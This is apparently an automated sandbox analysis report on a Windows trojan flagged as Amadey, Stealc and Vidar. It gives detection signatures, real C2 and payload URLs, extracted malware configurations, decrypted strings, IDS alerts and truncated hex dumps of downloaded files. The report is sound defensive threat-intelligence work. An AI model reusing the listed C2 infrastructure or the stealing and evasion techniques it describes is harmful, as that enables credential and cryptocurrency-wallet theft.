Windows Analysis Report
Wf9qnVcbi8.exe

Overview

General Information

Sample name: Wf9qnVcbi8.exe
(renamed because the original name is a hash value)
Original sample name: 58972b34ce77f8d7bbaa3f5b5344db20.exe
Analysis ID: 1465786
MD5: 58972b34ce77f8d7bbaa3f5b5344db20
SHA1: a3dc18dbe5abb0fffe62427366ff5f52e16a28a7
SHA256: 048802231eccee2a6db341d1a4e92b2b1671eb287da215ad35fcf2bad70fa700
Tags: 32 exe trojan

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: Wf9qnVcbi8.exe Avira: detected
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpf Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllnH Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe% Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe; Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.phpUd Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php/ Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php. Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.phpGd Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exephprefoxox Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exera Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll-f Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exeVs-= Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpr Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exepData Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllrf Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll#ab= Avira URL Cloud: Label: malware
Source: http://85.28.47.4/wd Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.phpZ Avira URL Cloud: Label: malware
Source: 85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll:HK Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpa Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpDTo Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpp Avira URL Cloud: Label: malware
Source: http://85.28.47.4/c9 Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 13.2.528307a0ac.exe.550000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: Wf9qnVcbi8.exe.1864.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.7436.12.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
Source: http://77.91.77.82/Hun4Ko/index.phpP Virustotal: Detection: 22%
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 27%
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 27%
Source: http://85.28.47.4/ Virustotal: Detection: 17%
Source: http://77.91.77.82/Hun4Ko/index.php Virustotal: Detection: 24%
Source: http://77.91.77.82/Hun4Ko/index.php2 Virustotal: Detection: 21%
Source: http://77.91.77.82/Hun4Ko/index.phpV Virustotal: Detection: 22%
Source: http://77.91.77.82/Hun4Ko/index.php. Virustotal: Detection: 21%
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Virustotal: Detection: 6%
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Virustotal: Detection: 22%
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Virustotal: Detection: 7%
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Virustotal: Detection: 9%
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Virustotal: Detection: 7%
Source: http://77.91.77.82/Hun4Ko/index.php/ Virustotal: Detection: 22%
Source: http://77.91.77.82/Hun4Ko/index.php: Virustotal: Detection: 21%
Source: http://77.91.77.82/ Virustotal: Detection: 23%
Source: http://77.91.77.81/mine/amadka.exe00 Virustotal: Detection: 25%
Source: http://85.28.47.4/920475a59bac849d.php Virustotal: Detection: 23%
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe ReversingLabs: Detection: 52%
Source: Wf9qnVcbi8.exe Virustotal: Detection: 45%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: Wf9qnVcbi8.exe Joe Sandbox ML: detected
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetProcAddress
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: LoadLibraryA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: lstrcatA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: OpenEventA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CreateEventA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CloseHandle
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: Sleep
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetUserDefaultLangID
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: VirtualAllocExNuma
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: VirtualFree
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetSystemInfo
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: VirtualAlloc
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: HeapAlloc
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetComputerNameA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: lstrcpyA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetProcessHeap
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetCurrentProcess
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: lstrlenA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: ExitProcess
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetSystemTime
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: SystemTimeToFileTime
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: advapi32.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: gdi32.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: user32.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: crypt32.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: ntdll.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetUserNameA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CreateDCA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetDeviceCaps
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: ReleaseDC
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CryptStringToBinaryA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: sscanf
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: VMwareVMware
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: HAL9TH
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: JohnDoe
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: DISPLAY
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: %hu/%hu/%hu
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: http://85.28.47.4
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: /920475a59bac849d.php
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: /69934896f997d5bb/
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: jony
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetFileAttributesA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GlobalLock
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: HeapFree
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetFileSize
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GlobalSize
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: IsWow64Process
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: Process32Next
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetLocalTime
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: FreeLibrary
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetTimeZoneInformation
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetSystemPowerStatus
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetVolumeInformationA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: Process32First
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetLocaleInfoA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetModuleFileNameA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: DeleteFileA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: FindNextFileA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: LocalFree
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: FindClose
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: LocalAlloc
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetFileSizeEx
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: ReadFile
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: SetFilePointer
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: WriteFile
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CreateFileA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: FindFirstFileA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CopyFileA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: VirtualProtect
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetLastError
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: lstrcpynA
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: MultiByteToWideChar
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GlobalFree
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: WideCharToMultiByte
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GlobalAlloc
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: OpenProcess
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: TerminateProcess
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: GetCurrentProcessId
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: gdiplus.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: ole32.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: bcrypt.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: wininet.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: shlwapi.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: shell32.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: psapi.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: rstrtmgr.dll
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: SelectObject
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: BitBlt
Source: 13.2.528307a0ac.exe.550000.0.unpack String decryptor: DeleteObject
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C556C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C556C80
Source: Wf9qnVcbi8.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: Wf9qnVcbi8.exe, 00000000.00000002.2226915116.000000006C5BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Wf9qnVcbi8.exe, 00000000.00000002.2226915116.000000006C5BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49704 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49704 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.5:49704
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49704 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.5:49704
Source: Malware configuration extractor URLs: 85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Date: Tue, 02 Jul 2024 02:11:59 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT; ETag: "10e436-5e7eeebed8d80"; Accept-Ranges: bytes; Content-Length: 1106998; Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Date: Tue, 02 Jul 2024 02:12:05 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT; ETag: "a7550-5e7ebd4425100"; Accept-Ranges: bytes; Content-Length: 685392; Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Date: Tue, 02 Jul 2024 02:12:06 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT; ETag: "94750-5e7ebd4425100"; Accept-Ranges: bytes; Content-Length: 608080; Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Date: Tue, 02 Jul 2024 02:12:07 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT; ETag: "6dde8-5e7ebd4425100"; Accept-Ranges: bytes; Content-Length: 450024; Content-Type: application/x-msdos-program
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 02:12:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
